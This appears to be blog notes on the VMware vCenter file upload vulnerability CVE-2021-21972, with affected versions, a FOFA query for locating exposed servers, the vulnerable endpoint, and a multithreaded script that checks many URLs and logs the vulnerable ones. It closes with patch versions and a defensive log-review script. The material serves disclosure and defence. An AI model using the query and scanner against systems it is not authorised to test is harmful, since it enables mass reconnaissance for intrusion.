Notes on the VMware vCenter unauthenticated arbitrary file upload vulnerability (CVE-2021-21972)


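Background

CVE-2021-21972 is an unauthenticated command execution vulnerability in VMware vCenter. It allows a webshell to be uploaded to an arbitrary location on the vCenter server and then executed.

Affected versions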

vmware:esxi:7.0/6.7/6.5

vmware:vcenter_server:7.0/6.7/6.5

Reproducing the vulnerability

FOFA query

Syntax: title="+ ID_VC_Welcome +"


POC

https://x.x.x.x/ui/vropspluginui/rest/services/uploadova


Use the script from https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC for bulk verification:

    # -*- coding:utf-8 -*-
    banner = """
    @time:2021/02/24
    CVE-2021-21972.py
    C0de by NebulabdSec - @batsu
    """
    print(banner)

    import threadpool  # third-party package
    import random
    import requests
    import argparse
    import http.client
    import urllib3

    # Suppress the certificate warnings caused by verify=False below.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    # Force http.client to speak HTTP/1.0.
    http.client.HTTPConnection._http_vsn = 10
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

    TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"


    def get_ua():
        # Build a randomised Chrome User-Agent string.
        first_num = random.randint(55, 62)
        third_num = random.randint(0, 3200)
        fourth_num = random.randint(0, 140)
        os_type = [
            '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
            '(X11; Linux x86_64)', '(Macintosh; Intel Mac OS X 10_12_6)'
        ]
        chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
        ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                       '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
        return ua


    def CVE_2021_21972(url):
        # "scoks5" is not a URL scheme, so requests ignores this entry
        # and connects directly.
        proxies = {"scoks5": "http://127.0.0.1:1081"}
        headers = {
            'User-Agent': get_ua(),
            "Content-Type": "application/x-www-form-urlencoded"
        }
        targetUrl = url + TARGET_URI
        try:
            res = requests.get(targetUrl, headers=headers, timeout=15,
                               verify=False, proxies=proxies)
            # An unauthenticated GET answered with 405 (Method Not Allowed)
            # means the upload endpoint is reachable without logging in.
            if res.status_code == 405:
                # Message: "CVE-2021-21972 vulnerability present"
                print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
                # Append the URL to the results file ("vulnerable addresses").
                with open("存在漏洞地址.txt", 'a') as fw:
                    fw.write(url + '\n')
            else:
                # Message: "CVE-2021-21972 vulnerability not found"
                print("[-] " + url + " 没有发现CVE-2021-21972漏洞.\n")
        except Exception:
            print("[-] " + url + " Request ERROR.\n")


    def multithreading(filename, pools=5):
        # Read one URL per line and check them with a thread pool.
        works = []
        with open(filename, "r") as f:
            for i in f:
                func_params = [i.rstrip("\n")]
                works.append((func_params, None))
        pool = threadpool.ThreadPool(pools)
        reqs = threadpool.makeRequests(CVE_2021_21972, works)
        for req in reqs:
            pool.putRequest(req)
        pool.wait()


    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
        parser.add_argument("-f", "--file", help="Url File; Example:url.txt")
        args = parser.parse_args()
        url = args.url
        file_path = args.file
        if url is not None and file_path is None:
            CVE_2021_21972(url)
        elif url is None and file_path is not None:
            multithreading(file_path, 10)  # 10 worker threads


    if __name__ == "__main__":
        main()


EXP

Remediation

Upgrade vCenter Server 7.0 to 7.0 U1c

Upgrade vCenter Server 6.7 to 6.7 U3l

Upgrade vCenter Server 6.5 to 6.5 U3n
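
Alongside patching, access logs can be reviewed for requests to the uploadova endpoint shown above. The following is an added example, not part of the original post or the PoC repository: it separates GET probes answered with 405 (the response the checker script keys on) from POST requests to the same path. The Common Log Format input, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Endpoint taken from this page; log format and names below are assumptions.
UPLOAD_PATH = "/ui/vropspluginui/rest/services/uploadova"

# Common Log Format: ip ident user [ts] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (ip, kind) for a request to the upload endpoint, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Normalise: drop query string, collapse repeated slashes, ignore case.
    path = re.sub(r"/+", "/", m["path"].split("?", 1)[0]).rstrip("/").lower()
    if path != UPLOAD_PATH:
        return None
    status = int(m["status"])
    if m["method"] == "POST":
        kind = "upload-2xx" if 200 <= status < 300 else "upload-attempt"
    else:
        # 405 is the response the checker script on this page keys on.
        kind = "probe-405" if status == 405 else "probe-other"
    return m["ip"], kind

def summarize(lines):
    """Map source IP -> distinct finding kinds, in first-seen order."""
    findings = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit and hit[1] not in findings[hit[0]]:
            findings[hit[0]].append(hit[1])
    return dict(findings)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [24/Feb/2021:10:01:02 +0000] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.0" 405 0',
    '198.51.100.7 - - [24/Feb/2021:10:01:09 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 7',
    '203.0.113.20 - - [24/Feb/2021:10:05:00 +0000] "GET /ui/ HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Feb/2021:11:00:00 +0000] "GET /ui//vropspluginui/rest/services/uploadova?x=1 HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for ip, kinds in summarize(SAMPLE).items():
        print(ip, ", ".join(kinds))
```

A source IP that shows "upload-2xx" is the case to triage first, since the POST to the upload path was answered with a success status.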

